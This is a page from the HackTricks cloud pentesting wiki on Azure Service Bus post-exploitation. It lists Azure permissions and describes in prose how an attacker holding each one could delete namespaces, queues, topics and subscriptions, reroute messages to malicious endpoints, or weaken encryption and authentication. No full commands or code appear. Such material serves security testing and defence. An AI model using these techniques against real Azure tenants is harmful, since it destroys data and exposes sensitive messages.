Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
For more information check:
Az - Service Bus
Microsoft.ServiceBus/namespaces/DeleteAn attacker with this permission can delete an entire Azure Service Bus namespace. This action removes the namespace and all associated resources, including queues, topics, subscriptions, and their messages, causing widespread disruption and permanent data loss across all dependent systems and workflows.
Microsoft.ServiceBus/namespaces/topics/DeleteAn attacker with this permission can delete an Azure Service Bus topic. This action removes the topic and all its associated subscriptions and messages, potentially causing loss of critical data and disrupting systems and workflows relying on the topic.
Microsoft.ServiceBus/namespaces/queues/DeleteAn attacker with this permission can delete an Azure Service Bus queue. This action removes the queue and all the messages within it, potentially causing loss of critical data and disrupting systems and workflows dependent on the queue.
Microsoft.ServiceBus/namespaces/topics/subscriptions/DeleteAn attacker with this permission can delete an Azure Service Bus subscription. This action removes the subscription and all its associated messages, potentially disrupting workflows, data processing, and system operations relying on the subscription.
Microsoft.ServiceBus/namespaces/write & Microsoft.ServiceBus/namespaces/readAn attacker with permissions to create or modify Azure Service Bus namespaces can exploit this to disrupt operations, deploy unauthorized resources, or expose sensitive data. They can alter critical configurations such as enabling public network access, downgrading encryption settings, or changing SKUs to degrade performance or increase costs. Additionally, they could disable local authentication, manipulate replica locations, or adjust TLS versions to weaken security controls, making namespace misconfiguration a significant post-exploitation risk.
Microsoft.ServiceBus/namespaces/queues/write (Microsoft.ServiceBus/namespaces/queues/read)An attacker with permissions to create or modify Azure Service Bus queues (to modiffy the queue you will also need the Action:Microsoft.ServiceBus/namespaces/queues/read) can exploit this to intercept data, disrupt workflows, or enable unauthorized access. They can alter critical configurations such as forwarding messages to malicious endpoints, adjusting message TTL to retain or delete data improperly, or enabling dead-lettering to interfere with error handling. Additionally, they could manipulate queue sizes, lock durations, or statuses to disrupt service functionality or evade detection, making this a significant post-exploitation risk.
Microsoft.ServiceBus/namespaces/topics/write (Microsoft.ServiceBus/namespaces/topics/read)An attacker with permissions to create or modify topics (to modiffy the topic you will also need the Action:Microsoft.ServiceBus/namespaces/topics/read) within an Azure Service Bus namespace can exploit this to disrupt message workflows, expose sensitive data, or enable unauthorized actions. Using commands like az servicebus topic update, they can manipulate configurations such as enabling partitioning for scalability misuse, altering TTL settings to retain or discard messages improperly, or disabling duplicate detection to bypass controls. Additionally, they could adjust topic size limits, change status to disrupt availability, or configure express topics to temporarily store intercepted messages, making topic management a critical focus for post-exploitation mitigation.
Microsoft.ServiceBus/namespaces/topics/subscriptions/write (Microsoft.ServiceBus/namespaces/topics/subscriptions/read)An attacker with permissions to create or modify subscriptions (to modiffy the subscription you will also need the Action: Microsoft.ServiceBus/namespaces/topics/subscriptions/read) within an Azure Service Bus topic can exploit this to intercept, reroute, or disrupt message workflows. Using commands like az servicebus topic subscription update, they can manipulate configurations such as enabling dead lettering to divert messages, forwarding messages to unauthorized endpoints, or modifying TTL and lock duration to retain or interfere with message delivery. Additionally, they can alter status or max delivery count settings to disrupt operations or evade detection, making subscription control a critical aspect of post-exploitation scenarios.
AuthorizationRules Send & Recive MessagesTake a look here:
https://github.com/HackTricks-wiki/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-services/az-queue-privesc.mdhttps://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
https://learn.microsoft.com/en-us/cli/azure/servicebus/namespace?view=azure-cli-latest
https://learn.microsoft.com/en-us/cli/azure/servicebus/queue?view=azure-cli-latest
Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
